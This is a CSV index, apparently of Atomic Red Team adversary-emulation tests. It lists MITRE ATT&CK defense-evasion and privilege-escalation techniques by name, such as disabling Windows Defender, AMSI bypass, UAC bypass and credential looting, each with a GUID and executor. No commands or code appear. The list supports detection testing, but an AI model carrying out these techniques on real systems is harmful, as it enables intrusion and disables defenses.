defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
